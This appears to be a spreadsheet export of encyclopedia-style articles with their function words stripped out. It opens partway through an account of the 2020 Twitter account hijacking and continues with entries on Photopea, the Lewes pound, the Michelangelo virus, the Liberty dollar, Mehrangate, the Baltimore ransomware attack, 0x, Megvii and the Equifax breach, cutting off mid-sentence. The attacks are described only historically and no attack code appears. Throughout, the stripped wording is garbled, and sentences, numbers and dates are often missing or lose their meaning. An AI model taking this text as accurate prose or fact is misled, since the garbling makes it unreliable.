countries. reused phrasing allowed twitter remove offending tweets easily took steps stop scam.by 21:45 utc, twitter released statement saying "aware security incident impacting accounts twitter" "taking steps it". shortly afterwards, disabled ability accounts tweet, reset password; twitter confirmed accounts restricted, many users accounts twitter marked "verified" confirmed unable tweet. approximately three hours first scam tweets, twitter reported believed resolved affected accounts restore credentials rightful owners. later night, twitter jack dorsey said "tough twitter. feel terrible happened. we're diagnosing share everything complete understanding exactly happened." least cryptocurrency exchange, coinbase, blacklisted bitcoin addresses prevent money sent. coinbase said stopped 1,000 transactions totaling us$280,000 sent.in addition sending tweets, account data eight compromised accounts downloaded, including created posts direct messages, though none accounts belonged verified users. twitter also suspected thirty-six accounts direct messages accessed downloaded including dutch parliament representative geert wilders, believed current former elected official messages accessed. method attack twitter working resolve situation july vice contacted least four individuals claiming part scam presented website screenshots showing able gain access twitter administrative tool, also known "agent tool", allowed change various account-level settings compromised accounts, including confirmation emails account. this allowed email addresses user access email account could initiate password reset post tweets. these hackers told vice paid insiders twitter access administrative tool able pull off.techcrunch reported similarly, based source stated messages member hacking forum called "ogusers", claimed made us$100,000 according techcrunch's source, member "kirk" reportedly gained access twitter administrative tool likely compromised employee account, initially offering take account request, switched strategies target cryptocurrency accounts starting binance higher-profile ones. source believe kirk paid twitter employee access.the "@6" twitter belonged adrian lamo, user maintaining account behalf lamo's family reported group performed hack able bypass numerous security factors account, including two-factor authentication, indicating administrative tools used bypass account security. spokespersons white house stated president donald trump's account, target, extra security measures implemented twitter incident 2017, therefore affected scam.vice's techcrunch's sources corroborated york times, spoke similar persons involved events, security researchers given similar screens, tweets screens made, twitter removed since revealed personal details compromised accounts. york times affirmed vector attack related company remote working covid-19 pandemic. ogusers members able gain access twitter employees' slack communications channel information authorization processes accessing company's servers remote working pinned.twitter subsequently confirmed scam involved social engineering, stating detected believe coordinated social engineering attack people successfully targeted employees access internal systems tools." addition taking steps lock verified accounts affected, twitter said also begun internal investigation limited employee access system administrative tools evaluate situation, well additional data compromised malicious users.by july 2020, twitter affirmed learned media sources, stating "the attackers successfully manipulated small number employees used credentials access twitter's internal systems, including getting two-factor protections. now, know accessed tools available internal support teams." twitter able confirm july method used called "phone spear phishing attack": initially used social engineering breach credentials lower-level twitter employees access admin tools, using employee accounts, engaged additional social engineering attacks credentials admin tools employees authorization use.bloomberg news, investigation former current twitter employees, reported many 1500 twitter employees partners access admin tools would allow ability reset accounts done incident. former twitter employees told bloomberg even late 2017 2018, access would make game using tools track famous celebrities though amount data visible tools alone limited elements like address geolocation information. twitter spokesperson told bloomberg "extensive security training managerial oversight" manage employees partners access tools, indication partners work customer service account management played part here". former members twitter's security departments stated since 2015, company alerted potential inside attack, cybersecurity measures, aside, favor revenue-generating initiatives.ars technica obtained detailed report researcher worked investigation. according report, attackers scraped linkedin search twitter employees likely administrator privileges account-holder tools. then attackers obtained employees' cell phone numbers private contact information paid tools linkedin makes available recruiters. after choosing victims next stage, attackers contacted twitter employees, remote working covid-19 pandemic, and, using information linkedin public sources, pretended twitter personnel. attackers directed victims fake internal twitter vpn. bypass two-factor authentication, attackers entered stolen credentials real twitter portal, "within seconds employees entering info fake one", asked victims two-factor authentication code. perpetrators security researcher brian krebs corroborated techcrunch's source information obtained reuters scam appeared originated "ogusers" group. ogusers forum ("og" standing "original") established selling buying social media accounts short "rare" names, according owner, speaking reuters, practice trafficking hacked credentials prohibited. screenshots forum show various users forum offering hack twitter accounts us$2,000−3,000 each. krebs stated members tied august 2019 takeover twitter jack dorsey's twitter account. ogusers owner told reuters accounts shown screenshots since banned.the announced july launching investigation scam, used "perpetuate cryptocurrency fraud", criminal offense. senate select committee intelligence also planned twitter additional information hack, committee's vice-chair mark warner stated "the ability actors take prominent accounts, even fleetingly, signals worrisome vulnerability media environment, exploitable scams impactful efforts cause confusion, havoc political mischief". uk's national cyber security centre said officers reached twitter regarding incident. bittorrent justin announced us$1 million bounty hackers, company's twitter account stating personally successfully track down, provide evidence bringing justice, hackers/people behind hack affecting community."the united states department justice announced arrest charges three individuals tied scam july 2020. 19-year-old united kingdom charged multiple counts conspiracy commit wire fraud, conspiracy commit money laundering, intentional access protected computer, 22-year-old florida charged aiding abetting international access. both tried united states district court northern district california. third individual, minor florida, also indicted age, charges sealed juvenile court florida. state adult thirty charges related felony counts, including organized fraud, communications fraud, identity theft, hacking, state's allowing convict minors adults financial fraud cases. florida teen pleaded guilty charges august 2020. teen accepted plea bargain march 2021 included serving three years jail time including time served "youthful offender", even though turned trial.a fourth individual, 16-year-old massachusetts, identified possible suspect scam fbi. though federal agents conducted warranted search possessions late august 2020, indictments made yet. reaction aftermath affected users could retweet content, leading news temporary non-verified account could continue tweet, retweeting "significant updates" main account. some national weather service forecast offices unable tweet severe weather warnings, national weather service lincoln, illinois initially unable tweet tornado warning. biden's campaign stated touch twitter matter", account "locked down". google temporarily disabled twitter carousel search feature result security issues.during incident, twitter, inc.'s stock price fell markets closed. next day, twitter, inc.'s stock price ended $36.40, cents, 0.87%.security experts expressed concern scam relatively small terms financial impact, ability social media taken social engineering involving employees companies poses major threat social media particularly lead-up 2020 united states presidential election, could potentially cause international incident. alex stamos stanford university's center international security cooperation said, "twitter become important platform comes discussion among political elites, real vulnerabilities."twitter chose delay rolling aftermath security issues. september, twitter stated protocols place prevent similar social engineering attacks, including heightening background checks employees would access user data, implementing phishing-resistant security keys day, employees involved customer support participate training aware future social engineering scams.though part twitter incident, steve wozniak seventeen others initiated lawsuit google following week, asserting company take sufficient steps remove similar bitcoin scam videos posted youtube used plaintiffs' names, fraudulently claiming back scam. wozniak's complaint identified twitter able within day, plaintiffs' requests google never acted upon.on september 2020, twitter hired rinki sethi ciso company breach.on november 2020, hulu aired episode "the york times presents" series entitled "the teenager hacked twitter," details events incident. references external links ongoing updates twitter investigation intrusion systems, accessed, steps correct prevent similar attacks. overview bitcoin address' transactions archived july 2020, wayback machine</t>
  </si>
  <si>
    <t>Photopea</t>
  </si>
  <si>
    <t>photopea foh-tə-pee) web-based photo graphics editor. used image editing, making illustrations, design converting different image formats. photopea advertising-supported software. compatible modern browsers, including opera, edge, chrome, firefox. compatible raster vector graphics, photoshop’s well jpeg, png, dng, gif, svg, image file formats. while browser-based, photopea stores files locally, upload data server.photopea often considered free alternative adobe photoshop fewer features. features photopea various image editing tools including spot healing, clone stamp healing brush, patch tool. software supports layers, layer masks, channels, selections, paths, smart objects, layer styles, text layers, filters vector shapes. reception photopea received positive coverage similarities adobe photoshop design workflow, making easier program trained photoshop use, compared free raster image editors gimp. also comparison raster graphics editors pixlr references external links official website photopea blog photopea review</t>
  </si>
  <si>
    <t>Lewes pound</t>
  </si>
  <si>
    <t>lewes pound local currency town lewes, east sussex. inspired totnes pound berkshare, currency introduced blessing town council september 2008 transition town lewes community response challenges climate change peak oil. history lewes first introduced currency 1789, discontinued 1895 along number local currencies. reintroduction september 2008 achieved national media coverage. july 2009, announced scheme extended notes denominations would issued. note emphasises fact five pence lewes pound bought goes local charity live lewes fund.as 2017, notes circulation are: pound, green, undated pound, green, 2009 pound, green, 2017 pounds, blue, 2009 pounds, blue, 2013 pounds, blue, 2017 pounds, yellow, 2009 pounds, blue, 2014 pounds, red, 2009a special issue printed 750th anniversary battle lewes mid-2014. value value lewes pound fixed stg, january 2009 could used approximately shops lewes (having increased currency introduced). despite nominal value, businesses charge lesser lewes pounds, earliest notes sold ebay substantially higher values. appearance front features picture south downs image lewes resident thomas paine quotation his: power build world anew". back picture lewes castle. notes printed traditional banknote paper number security features including unique numbering, watermarks heat marks. criticism lewes pound transition towns movement received criticism failure address needs wider lewes population, especially lower socio-economic groups. such local currency initiatives widely criticised light limited success stimulating spending local economies unrealistic strategy reduce carbon emissions. also bristol pound stroud pound totnes pound berkshares toronto dollar brixton pound references external links official site details, pictures bulletin board community currency online magazine</t>
  </si>
  <si>
    <t>Michelangelo (computer virus)</t>
  </si>
  <si>
    <t>michelangelo virus computer virus first discovered february 1991 australia. virus designed infect systems, engage operating system make calls. michelangelo, like boot sector viruses, operated bios level. each year, virus remained dormant march birthday renaissance artist michelangelo. there reference artist virus, doubtful virus's developer(s) intended connection virus artist. name chosen researchers noticed coincidence activation date. actual significance date author unknown. michelangelo variant already endemic stoned virus.on march ps/2, virus overwrites first hundred sectors hard disk nulls. virus assumes geometry cylinders, heads, sectors track. although user's data would still hard disk, would irretrievable average user.on hard disks, virus moves original master boot record cylinder head sector floppy disks, disk virus moves original boot sector cylinder head sector disks, virus moves original boot sector cylinder head sector this last directory disks. this second-to-last directory 1.44 disks. directory exist disks.although designed infect systems, virus easily disrupt operating systems installed system since, like many viruses era, michelangelo infects master boot record hard drive. once system became infected, floppy disk inserted system (and written 1992 system could detect floppy inserted, virus could infect floppy access disk made) becomes immediately infected well. virus spends time dormant, activating march conceivable infected computer could years without detection long booted date, infected. virus first came widespread international attention january 1992, revealed computer software manufacturers accidentally shipped products, example intel's lanspool print server, infected virus. although infected machines numbered hundreds, resulting publicity spiraled "expert" claims, partially anti-virus company founder john mcafee, thousands even millions computers infected michelangelo. however, march 1992, 10,000 20,000 cases data loss reported.in subsequent years, users advised march waiting march else reset date march time march skip march eventually, news media lost interest, virus quickly forgotten. despite scenario given above, infected computer could evade detection years, 1997 cases reported wild. also timeline notable computer viruses worms references external links http://www.cert.org/advisories/ca-1992-02.html official advisory cert) michelangelo madness wayback machine (archived march 2008), chapter research report michelangelo fiasco: historical timeline vmyths dis-assembled michelangelo source code wayback machine (archived february 2012) http://www.f-prot.com/virusinfo/descriptions/michhelangelo.html</t>
  </si>
  <si>
    <t>Liberty dollar (private currency)</t>
  </si>
  <si>
    <t>american liberty dollar (ald) private currency produced united states. currency issued minted metal rounds (similar coins), gold silver certificates, electronic currency (eld). certificates "warehouse receipts" real gold silver owned bearer. according court documents, 250,000 holders liberty dollar certificates. metal warehoused sunshine minting coeur d'alene, idaho prior november 2007 raid federal bureau investigation (fbi) u.s. secret service (usss). until july 2009, liberty dollar distributed liberty services (formerly known "national organization repeal federal reserve internal revenue code" norfed), based evansville, indiana. created bernard nothaus, founder cannabis spiritual center malibu, california, co-founder royal hawaiian mint company.in 2009, nothaus others charged federal crimes connection liberty dollar, and, july 2009, nothaus announced closed liberty dollar operation, pending resolution criminal charges. march 2011, nothaus pronounced guilty "making coins resembling similar united states coins". late 2014, u.s. district court judge ruled liberty dollars seized 2007 fbi/usss operation returned owners. practices exchange service from 1998 july 2009, liberty services exchanged federal reserve notes dollars) silver liberty dollars (and later gold copper), well warehouse receipts paper digital forms. currency reform liberty services' original name "national organization repeal federal reserve internal revenue code" (norfed). since founding, organization asserted federal reserve unconstitutional harmful. company engaged series legal battles defending exchange service challenging exclusivity assertions made mint (see legal issues). function differences alternative currencies number alternative currencies exist united states, including phoenix dollars, baltimore's bnote, ithaca hours, bitcoin, digital gold currency. unlike alternative currencies, liberty dollars phoenix dollars denominated weight backed commodity: liberty dollars used gold, silver, platinum, copper. other private currencies different bases, tying value specific unit time; i.e., hour time dollar. under simplistic version model, future value currency would depend willingness people swap labor, regardless market value labor provided. however, systems ithaca hours introduced sophisticated models allow variations market value labor. liberty dollars also differed alternative currencies carried suggested dollar face value. laws pertain private currencies ordinary statutes fraud. coining technologically difficult printing, inclusion precious metal coins long seen means "embedding" value them. liberty dollar consisted coins printed notes. paper digital liberty dollars legally defined warehouse receipts backed physical commodity: weight precious metal. 486, however, makes crime make, utter, pass coin gold silver metal intended used money, definitive injunction minting coins purpose. liberty dollar base values, discounts, commissions liberty dollar "base value" created bernard nothaus. 2009, base value liberty dollar liberty dollars ounce silver. time liberty dollar operation closed, ounce liberty dollar gold pieces denominated $1,000 maximum charge spot price membership. previous base values silver ounce, silver ounce $500 gold ounce. non-members paid full face value currency except certain special numismatic items. members' discounts ranged 50%+ (actually, short periods crossovers possible even members could liberty dollars face value less). liberty dollar associates merchants used exchange liberty dollars discount, could "make money [they] spend money." distinguish liberty dollar worked, nothaus transitioned commission structure june 2007 associates merchants received commission form extra liberty dollars placed orders. regional currency officers received larger discounts; regional distributors official representatives liberty services. liberty dollar associate merchant discounts ranged 0.0%–50%+ (zero fifty percent) depending price silver was, relative liberty dollar base value, liberty dollar base value crossover points, time periods price stayed varying moving-day averages days fluctuating market, based liberty dollar formulas worked nothaus. regional currency office "regional currency office" kind distributor liberty dollars. exchange paid liberty dollar organization, could purchase liberty dollars resale discount. they also authorized purchase, convert, perhaps exchange liberty dollars federal reserve notes. legal issues federal government response numerous individuals within u.s. government interviewed regarding liberty dollar. liberty dollar organization asserts secret service agent stated "it's counterfeit money" remaining "skeptical" norfed. another agent reported warned liberty dollar "appears violation u.s.c. 514." minting liberty dollar coins also appears violation u.s.c. 486:whoever, except authorized law, makes utters passes, attempts utter pass, coins gold silver metal, alloys metals, intended current money, whether resemblance coins united states foreign countries, original design, shall fined title imprisoned five years, both. promoter liberty dollar asserts claudia dickens, spokeswoman u.s. treasury department's bureau engraving printing, previously said american liberty currency legitimate. dickens quoted said "there's nothing illegal this", treasury department's legal team reviewed currency. long 'legal tender' there's nothing wrong it."in 2006 u.s. mint issued press release stating prosecutors justice department determined using liberty dollars circulating money federal crime. press release also stated "liberty dollars" meant compete circulating coinage (currency) united states competition consequently criminal act. justice department also stated liberty dollar confusingly similar actual u.s. currency, language used norfed's website deceptive.the liberty dollar organization responded mint's press release stating "[t]he liberty dollar never claimed claim not, purport legal tender." promoters liberty dollar asserted liberty dollar legal tender, legal tender barter mutually exclusive concepts. promoter asserts liberty dollar numismatic piece medallion used voluntarily barter. bernard nothaus u.s. mint march 2007, liberty services owner bernard nothaus filed suit district court southern district indiana u.s. mint's claims regarding liberty dollar. defendants include henry paulson, secretary treasury; alberto gonzales, former attorney general united states; edmund moy, director mint. suit seeks declaratory judgment circulating liberty dollars voluntary barter currency federal crime injunction barring defendants publicly privately declaring liberty dollar illegal currency remove declarations u.s. mint's website. secret service raid liberty dollar offices raided agents federal bureau investigation (fbi) u.s. secret service (usss) november 2007. bernard nothaus, owner liberty services, sent email customers supporters saying agents took gold, silver, platinum, almost tons paul dollars. agents also seized computers files froze liberty dollar bank accounts. nothaus's email linked signup page class action lawsuit victims might recover assets. time, forms website relating purchases liberty dollars became nonfunctional. copies email warrant documents posted website. seizure warrant issued money laundering, mail fraud, wire fraud, counterfeiting, conspiracy.the local evansville courier press reported email, stating "fbi agent wendy osborne, spokeswoman fbi's indianapolis office, directed questions raid western district north carolina u.s. attorney's office. spokeswoman said information investigation. bernard nothaus, group's monetary architect author email, immediately respond message seeking comment."the associated press quoted nothaus november 2007, saying federal government "running scared right something .... volunteering meet agents arrested thrash court." indictment federal grand jury brought indictment nothaus three others 2009 united states district court statesville, north carolina, nothaus arrested june 2009. bernard nothaus charged count conspiracy possess sell coins resemblance similitude coins denomination higher five cents, silver coins resemblance genuine coins united states denominations five dollars greater, violation u.s.c. 485, u.s.c. 486, u.s.c. 371; count mail fraud violation u.s.c. 1341 u.s.c. count selling, possessing intent defraud, coins resemblance similitude united states coins denominations five cents higher, violation u.s.c. u.s.c. count uttering, passing, attempting utter pass, silver coins resemblance genuine u.s. coins denominations five dollars greater, violation u.s.c. u.s.c. 2.on july 2009, nothaus entered plea guilty. conviction march 2011, nothaus convicted "making, possessing selling coins", jury statesville, north carolina deliberated less hours. jury found guilty count u.s.c. u.s.c. count violating u.s.c. u.s.c. count conspiracy, u.s.c. 371, violate sections 486. faces years prison, $250,000 fine, forced give million worth minted coins precious metals government, weighing 16,000 pounds. attorney western district north carolina, anne tompkins, described liberty dollar unique form domestic terrorism" trying undermine legitimate currency country". justice department press release quotes saying: "while forms anti-government activities involve violence, every insidious represent clear present danger economic stability country."according associated press, "federal prosecutors successfully argued nothaus was, fact, trying pass silver coins u.s. currency. coming denominations liberty dollars also featured dollar sign, word "dollar" motto "trust god," similar trust" appears u.s. coins". conviction appealed. post-conviction since trial, york times said people describe nothaus "the rosa parks constitutional currency movement." appealed conviction, appeal denied november 2014.on november 2014, judge voorhees denied nothaus' motion acquittal. december 2014, despite prosecutor demands serve much years federal prison, sentenced months house arrest, years probation. part reasoning delivering greatly reduced sentence federal prosecutors demanded, judge richard voorhees considered nothaus' appeal, stated: ...if anything clear evidence presented trial, last thing nothaus wanted liberty dollars [to] confused coins issued united states government...his intention protest federal reserve system always plain. jury's verdict conflates program created function alternative federal reserve system designed [deceive] people believing thing nothaus protesting first place...the liberty dollars counterfeit intended function such. verdict perversion counterfeiting statutes aside.the conviction, seen victory government, defined u.s.c. prohibiting silver bullion, metal coin issued government authority, used currency commerce. silver certificates issued liberty services considered form counterfeiting violation law. bernard nothaus' probation officer suggested file early release probation year, recommended early termination court. termination probation formally granted december 2015 u.s. district judge richard voorhees: http://www.libertydollarnews.org/2015dec/bvnh_pt.pdf when asked government's motive accusing terrorism, nothaus scoffed, "this united states government. it's guns, surveillance, tanks, nuclear weapons, worried ex-surfer making money? give break!" forfeiture trial forfeiture trial scheduled resume monday, april 2011. federal prosecutors seeking take roughly million worth five tons liberty dollars minted gold silver seized 2007 warehouse usss. liberty dollars returned 2017, significant number seized liberty dollars returned owners petitions made court return. bernard nothaus continues honor redemption silver day. also references external links nothaus liberty dollar indictment official page (archive.org june 2009)</t>
  </si>
  <si>
    <t>Mehrangate</t>
  </si>
  <si>
    <t>mehrangate, also known mehran bank scandal, major political scandal took place first administration prime minister benazir bhutto 1990.the active-duty army officers agents engaged conspiring election campaign benazir bhutto oversaw campaign funding taxpayers' money islamic democratic alliance (ida) nawaz sharif nationwide elections held 1990. from official accounts ministry defence (mod), taxpayers funding directed transfer conservative politicians compete pakistan peoples party, much organized time.the nature sharif-beg collusion discovered ashraf qazi, then-director isi, wanted move taxpayers' funds another account banks failed meet requests, leading director opening investigation missing funds.: with media investigation matter grew, scandal became public asghar khan filing lawsuit supreme court pakistan pakistan peoples party 1994. case hearings investigations went several years 2012 supreme court pakistan eventually found nawaz sharif, aslam beg, asad durrani, bankers, conservative politicians pml(n) responsible guilty acts. background after exposure first scandal intelligence bureau (ib) 1989, president ghulam ishaq khan eventually used constitutional reserve powers dismissed first administration prime minister benazir bhutto, charging benazir's administration nepotism, political corruption, poor economic growth, order, foreign affairs, 1990.: after election commission (ecp) announced timeline schedule nationwide general elections, methodically systematically released taxpayer's funds ida's conservative politicians. authorization taxpayer's funds came lt-gen. asad durrani, then-director isi, enjoyed support president ghulam ishaq khan and, allegedly gen. beg, army chief time. during time, monetary embezzlement took place reported around 5.6bn (approx. million time), million later additionally deposited intelligence funds.: contents initiated pakistan army's chief army staff general mirza aslam alleged support president ghulam ishaq khan, payments million made inter-services intelligence (isi) director-general lieutenant-general asad durrani owner mehran bank, yunus habib. intelligence funds deposited mehran bank 1992 propping insolvent bank favor owner's help loaning money inter-services intelligence 1990 used creation right wing alliance islami jamhoori ittehad (iji) bankrolling campaigns many opponents ppp.the scandal subsequently broke director-general lieutenant-general javed ashraf qazi decided transfer intelligence fund back state owned banks official rules. mehran bank unable return money poor financial state collapsed. later discovered large sums siphoned fictitious parties.in 1995, mehran bank amalgamated national bank 1996 make full provision mehran's liabilities resulted loss year bank 1.260 billion.yunus habib arrested april 1994 misappropriation sale proceeds dollar bearer certificates. 1995, younus habib convicted fraud embezzlement given sentence years rigorous imprisonment special court offences banks sindh. april 1994, giving details payments made habib generals, politicians political parties, interior minister, naseerullah babar, told national assembly main beneficiary largess former army chief general mirza aslam received rs140 million. convictions march 2012, pakistan's supreme court summoned younis habib, (mirza aslam beg), asad durrani testify response lawsuit filed marshall asghar khan 1996. october 2012, supreme court tribunal found durrani guilty violating constitution roles bribery. evaded testifying court, arguing constitutional rights violated court's finding could testify. also operation midnight jackal references</t>
  </si>
  <si>
    <t>2019 Baltimore ransomware attack</t>
  </si>
  <si>
    <t>during baltimore ransomware attack 2019, american city baltimore, maryland servers largely compromised variant ransomware called robbinhood. baltimore became second u.s. city fall victim variant ransomware greenville, north carolina second major city population 500,000 people hacked ransomware years, atlanta attacked previous year. background baltimore targeted ransomware prior 2019 attack 2018, though attack smaller comparison took city's emergency dispatch system short duration. days first infection, mayor catherine pugh resigned amidst corruption scandal ultimately convicted sentenced years prison. replaced jack young. attack 2019, baltimore's government computer systems infected aggressive ransomware variant robbinhood. servers, exception essential services, taken offline. ransom note, hackers demanded bitcoin (roughly $76,280) exchange keys restore access. note stated demands within four days, price would increase within days city would permanently lose data. security expert nicole perlroth speculated stolen exploit eternalblue used infiltrate city's network vulnerabilities initiate attack, though memoir published february 2021, perlroth recanted original statement concluding exploit fact responsible.baltimore susceptible attack practices, included decentralized control technology budget failure allocate money information security manager wanted fund cyberattack insurance. attack compared ransomware attack atlanta previous year, second major robbinhood ransomware american city 2019, greenville, north carolina also affected april. aftermath attack negative impact real estate market property transfers could completed digitally system down, city's card payment system debt checking application rendered inaccessible. addition, city employees unable email system resorted creating gmail accounts workaround. google automatically blocked accounts first large number accounts created timespan, though company later restored gmail accounts.the recovery, initially estimated take several weeks ultimately lasted september. frank johnson, baltimore's director, unpaid leave following ransomware attack. since becoming city's director pugh administration, johnson criticized written disaster recovery plan handling 2019 attack, estimated cost city million. replaced deputy director todd carter, later became permanent director february 2020 johnson left role october. references external links pirate party germany: hackerangriff stadtverwaltung baltimore: verwundbar sind europäische städte? june 2019</t>
  </si>
  <si>
    <t>0x (decentralized exchange infrastructure)</t>
  </si>
  <si>
    <t>open-source, decentralized exchange infrastructure enables exchange tokenized assets multiple blockchains. developers incorporate exchange functionality applications, market makers create markets cryptocurrencies tokens. zrx, ethereum erc-20 token, native governance staking token individuals vote protocol changes stake tokens earn liquidity rewards ether (eth). project's creator core developer labs. history will warren amir bandeali began development project 2016, february 2017, released white paper following abstract: describe protocol facilitates friction peer-to-peer exchange erc20 tokens ethereum blockchain. protocol intended serve open standard common building block, driving interoperability among decentralized applications (dapps) incorporate exchange functionality. trades executed system ethereum smart contracts publicly accessible, free dapp hook into. dapps built protocol access public liquidity pools create liquidity pool charge transaction fees resulting volume. protocol unopinionated: impose costs users arbitrarily extract value group users benefit another. decentralized governance used continuously securely integrate updates base protocol without disrupting dapps users. project conducted initial coin offering (ico) august 2017 sold half total supply (500m) token hours, raising total $24m.in april 2018, david sacks, former paypal, joined 0x's advisory board.on october 2018, first ethereum erc-20 token begin trading us-based cryptocurrency exchange coinbase.on june 2020, announced formation labs stating, continue decentralize control protocol, platform take identity organization transition many productive stakeholders moving ecosystem forward."on february 2021, bitwise, creator manager world's largest crypto index fund, included token among portfolio cryptoassets defi crypto index fund. criticism controversy august 2017, days prior token sale, researchers cornell tech’s initiative cryptocurrencies contracts (ic3) alleged blog post protocol fundamental flaws design, questioned rationale using token relayer fees already existing token could used instead, criticized lack clarity token’s governance process would work. additionally, criticized etherdelta, decentralized exchange protocol facilitate token exchanges.in response allegations, will warren maintained protocol already successfully used 6,000 individuals purchased tokens token sale started. explained protocol built highly modular, upgradable system would improved upon time, governance function would plugged team certain implementation provided right incentives, code secure. references external links official website</t>
  </si>
  <si>
    <t>Megvii</t>
  </si>
  <si>
    <t>megvii (chinese: pinyin: kuàngshì) chinese technology company designs image recognition deep-learning software. based beijing, company develops artificial intelligence (ai) technology businesses public sector. 2019, company valued $usd billion. megvii largest provider third-party authentication software world, product, face++, world's largest computer vision platform. company faced u.s. investment export restrictions allegations aiding uyghur genocide. history company founded beijing megvii standing "mega vision." company's core product, face++, launched 2012 first online facial recognition platform china. 2015 megvii created brain++, deep-learning engine help train algorithms.megvii raised $100 million 2016, $460 million 2017 $750 million 2019.in 2017, megvii marketed authentication computational photography functions smart phone companies mobile application developers, smart logistics. megvii's ai-empowered products include personal iot, city supply chain iot. 2017 2018, megvii beat google, facebook, microsoft tests image recognition international conference computer vision.by june 2019, megvii 2,349 employees, valued billion, "world’s biggest provider third-party authentication software", corporate clients cities china. chinese government employs megvii software.in 2019, human rights watch reported finding face++ code integrated joint operations platform (ijop), police surveillance used collect data track uighur community xinjiang. human rights watch released correction report june 2019 stating megvii appear collaborated ijop, face++ code inoperable.in march 2020, megvii announced would make deep learning framework megengine open-source. u.s. sanctions megvii sanctioned u.s. government, placed united states bureau industry security's entity list october 2019, technology human rights abuses uyghurs xinjiang. december 2021, united states department treasury prohibited u.s. investment megvii, accusing company complicity aiding uyghur genocide. references</t>
  </si>
  <si>
    <t>2017 Equifax data breach</t>
  </si>
  <si>
    <t>equifax data breach occurred july 2017 american credit bureau equifax. private records 147.9 million americans along 15.2 million british citizens 19,000 canadian citizens compromised breach, making largest cybercrimes related identity theft. settlement united states federal trade commission, equifax offered affected users settlement funds free credit monitoring. february 2020, united states government indicted members china's people's liberation army hacking equifax plundering sensitive data part massive heist also included stealing trade secrets, though chinese communist party denied claims. data breach data breach equifax principally third-party software exploit patched, equifax failed update servers equifax using open-source apache struts website framework systems handling credit disputes consumers. security patch apache struts released march 2017 security exploit found users framework urged update immediately. security experts found unknown hacking group trying find websites failed update struts early march 2017 find system exploit.as determined postmortem analysis, breach equifax started 2017 equifax update credit dispute website version struts. hackers used exploit gain access internal servers equifax' corporate network. information first pulled hackers included internal credentials equifax employees, allowed hackers search credit monitoring databases guise authorized user. using encryption mask searches, hackers performed 9000 scans databases, extracted information small temporary archives transferred equifax servers avoid detection removed temporary archives complete. activities went days july 2017 equifax discovered breach subsequently, july 2017, shut exploit. least servers twenty different countries used different points breach, making tracking perpetrators difficult. while failure update struts failure, analysis breach found faults equifax' system made easy breach occur, including insecure network design lacked sufficient segmentation, potentially inadequate encryption personally identifiable information (pii), ineffective breach detection mechanisms.information accessed breach included first last names, social security numbers, birth dates, addresses and, instances, driver's license numbers estimated million americans, based equifax' analysis. information estimated range 400,000 million british residents well 8,000 canadian residents also compromised. additional 11,670 canadians affected well, later revealed equifax. credit card numbers approximately 209,000 u.s. consumers, certain dispute documents personally identifiable information approximately 182,000 u.s. consumers also accessed.since initial disclosure september 2017, equifax expanded number records discovered accessed. october 2017 march 2018, equifax reported additional million american consumer records accessed, respectively, bringing total 147.9 million. equifax narrowed estimate consumers affected breach 15.2 million october 2017, 693,665 sensitive personal data disclosed. equifax also estimated number drivers' licenses breached attack 10-11 million.security experts expected lucrative private data breach would turned around sold black markets dark web, though 2021, sign sale data. because data immediately show first months following breach, security experts theorized either hackers behind breach waiting significant amount time selling information since would "hot" sell close breach, nation-state behind breach planning using data non-financial manner espionage. disclosure short-term responses september 2017, equifax disclosed breach scope: affecting million americans. venturebeat called exposure data 140+ million customers "one biggest data breaches history." equifax shares dropped early trading breach made public. numerous media outlets advised consumers request credit freeze reduce impact breach.on september 2017, three days equifax revealed breach, congressman barry loudermilk (r-ga), given thousand dollars campaign funding equifax, introduced bill u.s. house representatives would reduce consumer protections relation nation's credit bureaus, including capping potential damages class action suit $500,000 regardless class size amount loss. bill would also eliminate punitive damages. following criticism consumer advocates, loudermilk agreed delay consideration bill "pending full complete investigation equifax breach".on september equifax released statement announcing immediate departures replacements chief information officer chief security officer. statement included bullet-point details intrusion, potential consequences consumers, company's response. company said hired cybersecurity firm mandiant august investigate intrusion internally. statement specify u.s. government authorities notified breach, although assert "the company continues work closely investigation".on september equifax paulino rego barros responded criticism equifax promising company would, early 2018, allow "all consumers option controlling access personal credit data", service would "offered free, life".on october equifax appointed technology executive scott mcgregor board directors. announcing change, board's chairman noted mcgregor's "extensive data security, cybersecurity, information technology risk management experience". wall street journal reported joined board's technology committee, duties include oversight cybersecurity. litigation numerous lawsuits filed equifax days disclosure breach. suit firm geragos geragos indicated would seek billion damages, would make largest class-action suit u.s. history. since october 2017, hundreds consumers sued equifax data breach, winning small claims cases excess $9,000, including actual damages, future damages, anxiety, monitoring fees punitive damages.in september 2017, richard cordray, director consumer financial protection bureau (cfpb), authorized investigation data breach behalf affected consumers. however, november 2017, mick mulvaney, president donald trump's budget chief, appointed trump replace cordray, reported reuters "pulled back" probe, along shelving cordray's plans on-the-ground tests equifax protects data. cfpb also rebuffed bank regulators federal reserve bank, federal deposit insurance corporation office comptroller currency offered assist on-site exams credit bureaus. senator elizabeth warren, released report equifax breach february 2018, criticized mulvaney's actions, stating: "we're unveiling report mick mulvaney killing consumer agency's probe equifax breach. mick mulvaney shoots another middle finger consumers."on july 2019, equifax agreed settlement federal trade commission (ftc), cfpb, u.s. states, washington, d.c., puerto rico alleviate damages affected individuals make organizational changes avoid similar breaches future. total cost settlement included $300 million fund victim compensation, $175 million states territories agreement, $100 million cfpb fines. july 2019, published information affected individuals could file claim victim compensation fund using website equifaxbreachsettlement.com. perpetrators united states department justice announced february 2020 indicted four members china's military nine charges related hack, though additional evidence china since used data hack. chinese government denied four accused involvement hack. criticism following announcement may–july 2017 breach, equifax's actions received widespread criticism. equifax immediately disclose whether pins sensitive information compromised, explain delay discovery breach july public announcement early september. equifax stated delay time needed determine scope intrusion large amount personal data involved.it also revealed three equifax executives sold almost $1.8 million personal holdings company shares days equifax discovered breach month breach made public. company said executives, including chief financial officer john gamble, "had knowledge intrusion occurred time sold shares". september bloomberg reported u.s. justice department opened investigation determine whether insider trading laws violated. bloomberg notes, transactions pre-scheduled trades took place august three days company learned hack". when publicly revealing intrusion systems, equifax offered website (https://www.equifaxsecurity2017.com) consumers learn whether victims breach. security experts quickly noted website many traits common phishing website: hosted domain registered equifax, flawed implementation, wordpress generally considered suitable high-security applications. these issues open classify phishing site block access. moreover, members public wanting equifax website learn data compromised provide last name digits social security number.the website check whether person's personal data breached (trustedidpremier.com) determined security experts others return apparently random results instead accurate information. https://www.equifaxsecurity2017.com, website, too, registered constructed like phishing website, flagged several browsers.the trusted premier website contained terms use, dated september 2017 (the equifax announced security breach) included arbitration clause class action waiver. attorneys said arbitration clause ambiguous could require consumers accepted arbitrate claims related cybersecurity incident. according polly mosendz shahien nasiripour, "some fear[ed] simply using equifax website check whether information 